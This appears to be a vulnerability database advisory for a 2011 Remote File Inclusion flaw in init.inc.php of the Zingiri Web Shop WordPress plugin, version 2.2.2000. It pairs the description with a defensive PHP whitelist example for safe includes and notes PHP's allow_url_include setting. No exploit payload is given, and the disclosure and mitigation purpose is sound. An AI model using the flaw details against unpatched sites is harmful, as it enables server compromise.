Vendor: Zingiri Web Shop
By: Ben Schmidt
CVSS: 7.5 (HIGH)
Remote File Inclusion (RFI)
CWE: 98
Product Name: Zingiri Web Shop
Affected Version From: 2.2.2000
Affected Version To: 2.2.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:zingiri:zingiri_web_shop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2011
Zingiri Web Shop WordPress plugin RFI
The Zingiri Web Shop WordPress plugin is vulnerable to Remote File Inclusion (RFI). The flaw allows an attacker to make the vulnerable server include a remote file, usually through a malicious URL, and execute it. The vulnerable code is in init.inc.php, the file used to initialize the plugin. It does not properly validate user-supplied input, so an attacker can have a malicious file included from a remote server.
Mitigation:
The best way to mitigate this vulnerability is to validate user-supplied input properly, either against a whitelist of accepted values or with a regular expression.
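
The whitelist approach applied to a PHP include, as an added example (this is not the plugin's code or the vendor's patch). The `page` parameter, the `includes` directory and the file names are hypothetical.

```php
<?php
// Added example: hypothetical names throughout, not taken from Zingiri Web Shop.

// Whitelist: request value => the only file that may be included for it.
const ALLOWED_PAGES = [
    'cart'     => 'cart.inc.php',
    'checkout' => 'checkout.inc.php',
    'catalog'  => 'catalog.inc.php',
];

/**
 * Map a user-supplied value to a local file path, or return null.
 * The user's string is only ever a lookup key, never part of the path.
 */
function resolve_include(string $baseDir, $requested): ?string
{
    // Reject arrays (?page[]=x) and anything but a short lowercase token,
    // which rules out URL schemes, slashes, dots and NUL bytes.
    if (!is_string($requested) || !preg_match('/\A[a-z]{1,32}\z/', $requested)) {
        return null;
    }
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested]);
    // Defence in depth: the resolved file must exist inside the base directory
    // (catches a symlink placed among the include files).
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage in a request handler: unknown values get a 400, nothing is included.
$file = resolve_include(__DIR__ . '/includes', $_GET['page'] ?? 'catalog');
if ($file === null) {
    http_response_code(400);
    exit('Unknown page');
}
require $file;
```

Independently of input validation, PHP's `allow_url_include` setting (off by default) prevents `include` and `require` from loading URLs.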